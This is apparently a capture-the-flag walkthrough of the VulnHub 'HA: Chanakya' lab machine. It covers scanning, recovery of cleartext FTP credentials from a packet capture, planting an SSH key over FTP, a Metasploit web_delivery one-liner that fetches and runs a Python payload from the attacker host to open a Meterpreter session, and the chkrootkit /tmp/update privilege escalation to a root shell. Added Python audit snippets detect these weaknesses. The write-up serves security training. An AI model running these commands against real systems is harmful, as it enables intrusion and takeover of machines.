HA_CHANAKYA-(VULNHUB)

Report Link: http://download.vulnhub.com/ha/chanakya.zip

root@kali:~/Downloads# nmap -A 192.168.135.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 17:12 GMT
Nmap scan report for 192.168.135.132
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.0.0 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.135.132:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fd:4b:52:55:c2:41:5f:51:a4:5d:90:5b:be:17:0d:13 (RSA)
| 256 f1:98:34:0a:43:97:6d:c7:e0:78:d3:23:e0:4e:18:11 (ECDSA)
|_ 256 9d:eb:79:af:59:c0:bb:c2:4a:e3:00:7c:05:62:48:30 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Chanakya
MAC Address: 00:0C:29:BB:CA:D3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.135.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

In the browser, open:

http://192.168.135.132/

root@kali:~/Downloads# dirb http://192.168.135.132/ -X .txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov 30 17:17:25 2019
URL_BASE: http://192.168.135.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.135.132/ ----
+ http://192.168.135.132/abuse.txt (CODE:200|SIZE:14)

-----------------
END_TIME: Sat Nov 30 17:17:30 2019
DOWNLOADED: 4612 - FOUND: 1

root@kali:~/Downloads# wget http://192.168.135.132/abuse.txt
--2019-11-30 17:18:09-- http://192.168.135.132/abuse.txt
Connecting to 192.168.135.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14 [text/plain]
Saving to: 'abuse.txt'

abuse.txt 100%[===================================================================>] 14 --.-KB/s in 0s

2019-11-30 17:18:09 (3.12 MB/s) - 'abuse.txt' saved [14/14]

root@kali:~/Downloads# cat abuse.txt
nfubxn.cpncat

The content is ROT13-encoded. Decoding it (for example at https://rot13.com/) gives the name of a second file on the web server:

nfubxn.cpncat -> ashoka.pcapng

root@kali:~/Downloads# wget http://192.168.135.132/ashoka.pcapng
--2019-11-30 17:19:51-- http://192.168.135.132/ashoka.pcapng
Connecting to 192.168.135.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 101900 (100K)
Saving to: 'ashoka.pcapng'

ashoka.pcapng 100%[===================================================================>] 99.51K --.-KB/s in 0.001s

2019-11-30 17:19:51 (118 MB/s) - 'ashoka.pcapng' saved [101900/101900]

root@kali:~/Downloads# wireshark ashoka.pcapng

In Wireshark, apply the display filter tcp.stream eq 1 and follow the TCP stream. The FTP control channel carries the login in cleartext:

USER ashoka
331 Username ok, send password.
PASS kautilya
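What Follow TCP Stream exposes here is that FTP authenticates in cleartext, so a capture of the control channel yields a reusable password. The following is an added example, not part of the original write-up: a small parser that reconstructs login attempts from such a transcript, pairing each USER/PASS with the 230 or 530 reply that settled it, and recording only that a cleartext password was sent (its length, never its value) so the output is safe to keep in monitoring logs. The transcript is constructed.

```python
# Constructed FTP control-channel transcript in the layout Wireshark's
# "Follow TCP Stream" shows: one rejected login, then the accepted one.
SAMPLE_STREAM = (
    "220 pyftpdlib based ftpd ready.\r\n"
    "USER ashoka\r\n"
    "331 Username ok, send password.\r\n"
    "PASS notthisone\r\n"
    "530 Authentication failed.\r\n"
    "USER ashoka\r\n"
    "331 Username ok, send password.\r\n"
    "PASS kautilya\r\n"
    "230 Login successful.\r\n"
    "TYPE I\r\n"
    "200 Type set to: Binary.\r\n"
)


def extract_ftp_logins(stream):
    """Reconstruct login attempts from an FTP control stream.

    Each USER/PASS pair is settled by the next 230 (accepted) or 530
    (rejected) reply; single-line replies are assumed. The password is
    never stored, only that it crossed the wire in the clear and how long
    it was, so the result can go into monitoring output as-is.
    """
    attempts, current = [], None
    for line in stream.splitlines():
        verb, _, arg = line.partition(" ")
        if verb.upper() == "USER":
            current = {"user": arg, "cleartext_password": False, "password_len": 0}
        elif verb.upper() == "PASS" and current is not None:
            current["cleartext_password"] = True
            current["password_len"] = len(arg)
        elif verb in ("230", "530") and current is not None:
            current["accepted"] = verb == "230"
            attempts.append(current)
            current = None
    return attempts


if __name__ == "__main__":
    for attempt in extract_ftp_logins(SAMPLE_STREAM):
        print(attempt)
```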

root@kali:~/Downloads# ftp 192.168.135.132
Connected to 192.168.135.132.
220 pyftpdlib based ftpd ready.
Name (192.168.135.132:root): ashoka
331 Username ok, send password.
Password: kautilya
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw------- 1 ashoka ashoka 1 Nov 05 15:57 .bash_history
-rw-r--r-- 1 ashoka ashoka 220 Nov 05 14:05 .bash_logout
-rw-r--r-- 1 ashoka ashoka 3771 Nov 05 14:05 .bashrc
drwx------ 2 ashoka ashoka 4096 Nov 05 14:18 .cache
drwxrwxr-x 3 ashoka ashoka 4096 Nov 05 14:26 .local
-rw-r--r-- 1 ashoka ashoka 807 Nov 05 14:05 .profile
226 Transfer complete.
ftp> mkdir .ssh
257 "/.ssh" directory created.
ftp> cd .ssh
250 "/.ssh" is the current directory.

root@kali:~/Downloads# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:pfrXft26I5ghrvy29SCC6uMPVr3j0OMYHYMw0x9mz5g root@kali
The key's randomart image is:
(randomart image omitted)

root@kali:~/Downloads# cd ~/.ssh

root@kali:~/.ssh# ls
id_rsa IMG_0545.JPG IMG_0547.JPG IMG_0552.JPG known_hosts MyPasswords.kdbx.john uzumaki.txt
id_rsa.pub IMG_0546.JPG IMG_0548.JPG IMG_0553.JPG MyPasswords.kdbx MyPasswords.kdbx.lock

root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

root@kali:~/.ssh# ls
authorized_keys id_rsa.pub IMG_0546.JPG IMG_0548.JPG IMG_0553.JPG MyPasswords.kdbx MyPasswords.kdbx.lock
id_rsa IMG_0545.JPG IMG_0547.JPG IMG_0552.JPG known_hosts MyPasswords.kdbx.john uzumaki.txt

root@kali:~/.ssh# cp authorized_keys /root/Downloads/

Back in the FTP session:

ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
local: authorized_keys: No such file or directory
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
563 bytes sent in 0.00 secs (8.5225 MB/s)
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r-- 1 root root 563 Nov 30 17:26 authorized_keys
226 Transfer complete.
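The drop above works because the FTP account has write access to its own home directory and sshd's default AuthorizedKeysFile lives inside that directory, so anyone holding the FTP password can install a key of their choosing. As an added example, not from the original write-up, the audit below expands AuthorizedKeysFile the way sshd does and reports the key paths the account itself could create or rewrite. The lab directory tree is constructed, and a root-owned /etc/ssh/authorized_keys/%u location is simulated with a uid that differs from the account's.

```python
import os
import stat
import tempfile

DEFAULT_AUTHORIZED_KEYS = ".ssh/authorized_keys .ssh/authorized_keys2"  # sshd default

def authorized_keys_paths(sshd_config, user, home):
    """Expand AuthorizedKeysFile as sshd does: %u user, %h home, %% literal %,
    relative paths under the home directory (Match blocks are not handled)."""
    setting = DEFAULT_AUTHORIZED_KEYS
    for raw in sshd_config.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "authorizedkeysfile":
            setting = parts[1]
            break  # sshd keeps the first value it reads for a keyword
    paths = []
    for tok in setting.split():
        tok = tok.replace("%%", "\0").replace("%u", user).replace("%h", home).replace("\0", "%")
        paths.append(tok if os.path.isabs(tok) else os.path.join(home, tok))
    return paths

def key_injection_points(sshd_config, user, home, account_uid):
    """Key files sshd trusts that the account could create or rewrite itself:
    the authorized_keys drop over FTP above needed exactly such a path."""
    weak = []
    for path in authorized_keys_paths(sshd_config, user, home):
        probe = os.path.abspath(path)
        while not os.path.lexists(probe):  # nearest existing ancestor decides
            probe = os.path.dirname(probe)
        st = os.stat(probe)
        if st.st_uid == account_uid or stat.S_IMODE(st.st_mode) & stat.S_IWOTH:
            weak.append(path)
    return weak

def demo():
    """Constructed lab tree: ashoka's home with the stock setting, then a key
    directory the account does not own (a different uid stands in for root)."""
    base = tempfile.mkdtemp()
    home = os.path.join(base, "home", "ashoka")
    os.makedirs(os.path.join(home, ".ssh"))
    keys = os.path.join(base, "etc", "ssh", "authorized_keys")
    os.makedirs(keys)
    os.chmod(keys, 0o755)  # root-style perms: only the owner may write
    me = os.getuid()
    stock = key_injection_points("", "ashoka", home, me)
    hardened = key_injection_points("AuthorizedKeysFile %s/%%u\n" % keys,
                                    "ashoka", home, me + 1)
    return {"stock": [os.path.relpath(p, base) for p in stock],
            "hardened": [os.path.relpath(p, base) for p in hardened]}
```

Moving keys to a root-owned directory (AuthorizedKeysFile /etc/ssh/authorized_keys/%u) or limiting the FTP account to read-only access removes the injection point.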

root@kali:~/.ssh# ssh ashoka@192.168.135.132
The authenticity of host '192.168.135.132 (192.168.135.132)' can't be established.
ECDSA key fingerprint is SHA256:cuEf1JsbferQL5tQ/iVC9mGMCIALDE5/sX/OJt5LgPQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.135.132' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Tue Nov 5 06:36:00 2019 from 192.168.1.107
ashoka@ubuntu:~$ ls /tmp
logs
systemd-private-c670d3f7fd934484a136a99270d2ddc6-apache2.service-O5mjMK
systemd-private-c670d3f7fd934484a136a99270d2ddc6-systemd-resolved.service-usRaRU
systemd-private-c670d3f7fd934484a136a99270d2ddc6-systemd-timesyncd.service-AfrL85
VMwareDnD
vmware-root_418-600543236
ashoka@ubuntu:~$ cat logs
cat: logs: No such file or directory
ashoka@ubuntu:~$ cat /tmp/logs
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not found
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not found
Checking `sshd'... not infected
Checking `syslogd'... not tested
Checking `tar'... not infected
Checking `tcpd'... INFECTED
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/lib/modules/4.15.0-20-generic/vdso/.build-id
/lib/modules/4.15.0-20-generic/vdso/.build-id
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for Suckit rootkit... Warning: /sbin/init INFECTED
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for common ssh-scanners default files... nothing found
Searching for suspect PHP files... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... not tested: can't exec
Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `w55808'... not infected
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp
Checking `OSX_RSPLUG'... not infected

The file is chkrootkit output, so chkrootkit runs on the box. In another terminal, start a Metasploit web_delivery handler:

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set LHOST 192.168.135.128
LHOST => 192.168.135.128
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.135.128:4444
[*] Using URL: http://0.0.0.0:8080/8MrSwDDPA4kwR8
[*] Local IP: http://192.168.135.128:8080/8MrSwDDPA4kwR8
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.135.128:8080/8MrSwDDPA4kwR8');exec(r.read());"

ashoka@ubuntu:~$ python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.135.128:8080/8MrSwDDPA4kwR8');exec(r.read());"

Back in msfconsole, a Meterpreter session opens:

msf5 exploit(multi/script/web_delivery) > [*] 192.168.135.132 web_delivery - Delivering Payload (454) bytes
[*] Sending stage (53755 bytes) to 192.168.135.132
[*] Meterpreter session 1 opened (192.168.135.128:4444 -> 192.168.135.132:60582) at 2019-11-30 17:30:16 +0000

msf5 exploit(multi/script/web_delivery) > use exploit/unix/local/chkrootkit
msf5 exploit(unix/local/chkrootkit) > set session 1
session => 1
msf5 exploit(unix/local/chkrootkit) > set LPORT 8888
LPORT => 8888
msf5 exploit(unix/local/chkrootkit) > exploit

[*] Started reverse TCP double handler on 192.168.135.128:8888
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 3MUfKmBnNryvzj3a;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: "3MUfKmBnNryvzj3a\r\n"
[*] Matching…
[*] A is input…
[*] Command shell session 2 opened (192.168.135.128:8888 -> 192.168.135.132:45516) at 2019-11-30 17:32:03 +0000
[+] Deleted /tmp/update
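The escalation above needs two things together: chkrootkit scheduled from root's cron (which is what produced /tmp/logs), and a chkrootkit release before 0.50, which executes a file named /tmp/update as root whenever it exists. Added here as an example, not part of the original write-up, is a short audit that reports both signals; the crontab text and the lab /tmp directory are constructed.

```python
import os
import stat
import tempfile

# Constructed root crontab; the chkrootkit line mirrors what fed /tmp/logs above.
SAMPLE_CRONTAB = """# m h dom mon dow command
SHELL=/bin/sh
*/1 * * * * /usr/sbin/chkrootkit > /tmp/logs 2>&1
0 3 * * * /usr/bin/apt-get update
"""

def chkrootkit_cron_lines(crontab_text):
    """Cron entries that run chkrootkit (comments and VAR=value lines skipped)."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        if "chkrootkit" in line:
            hits.append(line)
    return hits

def tmp_update_findings(tmp_dir):
    """Describe a staged <tmp_dir>/update, the file that chkrootkit releases
    before 0.50 execute as root whenever they run and it exists."""
    path = os.path.join(tmp_dir, "update")
    if not os.path.lexists(path):
        return []
    st = os.lstat(path)
    findings = ["%s exists" % path]
    if stat.S_ISLNK(st.st_mode):
        findings.append("it is a symlink")
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("it is executable")
    if st.st_uid != 0:
        findings.append("it is owned by uid %d, not root" % st.st_uid)
    return findings

def chkrootkit_exposure(crontab_text, tmp_dir):
    """Both signals together are what the privilege escalation above relies on."""
    cron = chkrootkit_cron_lines(crontab_text)
    update = tmp_update_findings(tmp_dir)
    return {"cron": cron, "update": update, "exposed": bool(cron and update)}

def demo():
    """Constructed lab /tmp holding an executable 'update', as the exploit staged it."""
    tmp = tempfile.mkdtemp()
    staged = os.path.join(tmp, "update")
    with open(staged, "w") as f:
        f.write("#!/bin/sh\necho constructed-sample\n")
    os.chmod(staged, 0o755)
    return chkrootkit_exposure(SAMPLE_CRONTAB, tmp)
```

Upgrading chkrootkit past 0.50 removes the execution path; until then, an executable /tmp/update appearing between cron runs is the thing to alert on.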

python -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://in.linkedin.com/in/geet-madan

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

@SAKSHAM DIXIT